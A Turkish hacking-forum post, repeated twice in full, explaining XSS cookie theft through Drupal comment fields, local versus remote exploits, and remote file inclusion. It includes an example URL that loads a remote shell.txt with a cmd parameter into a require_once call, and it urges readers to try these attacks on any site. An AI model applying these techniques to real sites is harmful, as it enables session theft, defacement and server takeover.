MySouLNeedLove
New member
Cross Site Scriptin ( XSS, CSS ) :
Cross Site Scriptin Yani XSS, CSS Nedir :
Bir Script Olayıdır.Scriptlerle Oynararak Saldırımız Gerçekleştiririz.
Hedefimiz Sitede Bulunan Kullanıcıya Ait Bilgileri Çalma Bunuda Scriptlerle Oynayarak Yapabiliriz.
Bunu Yapmak İçin Kodu Siteye Ulastırmak Gerekir ve Bunu Aktif Yonetici veya Uyenin Gormesi Gerekir.
Örnek vermek gerekirse, kullanıcıları sürekli login olma derdinden kurtaran cookie dosyaları bu yöntemle rahatlıkla çalınabilir.
Siz her defasında cookiesine sahip olduğunuz bir siteyi ziyaret ettiğinizde, browserınız sizin login bilgilerinizi cookie dosyanızdan alarak karşı siteye iletir.
Bizde sitede çalıştırdığımız bir script kodu ile bu bilgileri kendimize yollayabiliriz.
Detaylı Örnek Vereyim :
Drupal Sistemlerdeki Cross Site Scriptin Yani ( XSS, CSS ) Açıgını Videolu Olarak Anlatmıstım.
Herhangi Bir Drupal Sistemi Google’da Bulduk Diyelim.
Orda Goruslerimizi Belirtebiliyoruz.
Oraya Yazdıgımız Script Koduyla Cross Site Scriptin Yani ( XSS, CSS )
Olayını Gerçekleştirebiliriz.
Bu Olayı Test Etmek İçin Her Sistem de "" yazarak sitenin bu kodları çalışırıp çalıştırmadığına bakmak.
Eğer ki cookie verisi ekranda çıkarsa, bilin ki bu sitede bir açık var. Burda girdiğimiz kod, bir javascript kodu olup, ekrana cookie verimizi basıyor.
Bu Yontemle Anasayayı Deface Edebilir Hatta Siteyi Hackleyebiliriz de.
Cross Site Scriptin ( XSS, CSS ) Mantıgı Budur.Bu mantıkla Çalışmaktadır.Mantıgı Orendıkten Sonra Her Sisteme Cross Site Scriptin Olayını Uygulamayı Deneyebilirsiniz.
Exploit :
1.Local Exploitler
2.Remote Exploitler
Local Exploitler :
Sistem İçerisinde Kullandıgımız Exploitlerdir.Exploitin Amacı Sistem Root Yetkisine Sahip Olmaktır ( Hepimizin Amacı )
Remote Exploit :
Bu Tür Exploitler Bir Sistemden Bir Başka Sisteme Erişmek İçin Kullanılır.
Local Exploit’e Örnek :
Bir Serverdasınız Herhangi Bir Yerden server’a Baglandınız.
O Server’da Root Olmak İstiyorsunuz.
O Zaman Local Exploitleri Kullanıcaksınız.
Remote Exploit :
Örnek RFI Açılımı : Remote File Include Herkes Böyle Hitap Eder.
Aslında Buda Bi Tür Exploittir.
Örnek :
www.siteadi.com/yol/index.php?path=shelladresi.txt
O Zaman Uzakta Olan Shell Kodumuzu Sitede Çalıştırabiliyoruz.
RFI [ Remote File Include ] :
Bu Olarda Mantık Yukarıda Anlattıgım Gibi Uzakta Olan Shell Kodumuzu Sitede Çalıştırma...
Bu Cok Kapsamlı Bir Olaydır.
Kodlamalarda hata Arıyoruz.
Bulduk.Hata :
<?php
(..)
require_once($goUrL."/Settings.php");
?>
Örneğin php-nuke Style.php Dosyasında Böle Bir Kod Var.( Aslında Yok )
Bunu Değerlendirebiliriz.
www.siteadi.com/phpnuke/style.php?goUrL=http://siteadi.com/shell.txt?cmd=Is
http://siteadi.com/shell.txt?cmd=Is O Zaman Burdaki Kod Sitede Çalışır Yani Shellimizi Sitede Çalıştırmış Oluruz.
Bu Bi Örnekti Bu Mantıktan Yola Çıkarak Kodlamalarda Hata Arayabilirsiniz.
Cross Site Scriptin Yani XSS, CSS Nedir :
Bir Script Olayıdır.Scriptlerle Oynararak Saldırımız Gerçekleştiririz.
Hedefimiz Sitede Bulunan Kullanıcıya Ait Bilgileri Çalma Bunuda Scriptlerle Oynayarak Yapabiliriz.
Bunu Yapmak İçin Kodu Siteye Ulastırmak Gerekir ve Bunu Aktif Yonetici veya Uyenin Gormesi Gerekir.
Örnek vermek gerekirse, kullanıcıları sürekli login olma derdinden kurtaran cookie dosyaları bu yöntemle rahatlıkla çalınabilir.
Siz her defasında cookiesine sahip olduğunuz bir siteyi ziyaret ettiğinizde, browserınız sizin login bilgilerinizi cookie dosyanızdan alarak karşı siteye iletir.
Bizde sitede çalıştırdığımız bir script kodu ile bu bilgileri kendimize yollayabiliriz.
Detaylı Örnek Vereyim :
Drupal Sistemlerdeki Cross Site Scriptin Yani ( XSS, CSS ) Açıgını Videolu Olarak Anlatmıstım.
Herhangi Bir Drupal Sistemi Google’da Bulduk Diyelim.
Orda Goruslerimizi Belirtebiliyoruz.
Oraya Yazdıgımız Script Koduyla Cross Site Scriptin Yani ( XSS, CSS )
Olayını Gerçekleştirebiliriz.
Bu Olayı Test Etmek İçin Her Sistem de "" yazarak sitenin bu kodları çalışırıp çalıştırmadığına bakmak.
Eğer ki cookie verisi ekranda çıkarsa, bilin ki bu sitede bir açık var. Burda girdiğimiz kod, bir javascript kodu olup, ekrana cookie verimizi basıyor.
Bu Yontemle Anasayayı Deface Edebilir Hatta Siteyi Hackleyebiliriz de.
Cross Site Scriptin ( XSS, CSS ) Mantıgı Budur.Bu mantıkla Çalışmaktadır.Mantıgı Orendıkten Sonra Her Sisteme Cross Site Scriptin Olayını Uygulamayı Deneyebilirsiniz.
Exploit :
1.Local Exploitler
2.Remote Exploitler
Local Exploitler :
Sistem İçerisinde Kullandıgımız Exploitlerdir.Exploitin Amacı Sistem Root Yetkisine Sahip Olmaktır ( Hepimizin Amacı )
Remote Exploit :
Bu Tür Exploitler Bir Sistemden Bir Başka Sisteme Erişmek İçin Kullanılır.
Local Exploit’e Örnek :
Bir Serverdasınız Herhangi Bir Yerden server’a Baglandınız.
O Server’da Root Olmak İstiyorsunuz.
O Zaman Local Exploitleri Kullanıcaksınız.
Remote Exploit :
Örnek RFI Açılımı : Remote File Include Herkes Böyle Hitap Eder.
Aslında Buda Bi Tür Exploittir.
Örnek :
www.siteadi.com/yol/index.php?path=shelladresi.txt
O Zaman Uzakta Olan Shell Kodumuzu Sitede Çalıştırabiliyoruz.
RFI [ Remote File Include ] :
Bu Olarda Mantık Yukarıda Anlattıgım Gibi Uzakta Olan Shell Kodumuzu Sitede Çalıştırma...
Bu Cok Kapsamlı Bir Olaydır.
Kodlamalarda hata Arıyoruz.
Bulduk.Hata :
<?php
(..)
require_once($goUrL."/Settings.php");
?>
Örneğin php-nuke Style.php Dosyasında Böle Bir Kod Var.( Aslında Yok )
Bunu Değerlendirebiliriz.
www.siteadi.com/phpnuke/style.php?goUrL=http://siteadi.com/shell.txt?cmd=Is
http://siteadi.com/shell.txt?cmd=Is O Zaman Burdaki Kod Sitede Çalışır Yani Shellimizi Sitede Çalıştırmış Oluruz.
Bu Bi Örnekti Bu Mantıktan Yola Çıkarak Kodlamalarda Hata Arayabilirsiniz.
Yazan:MySouLNeedLove
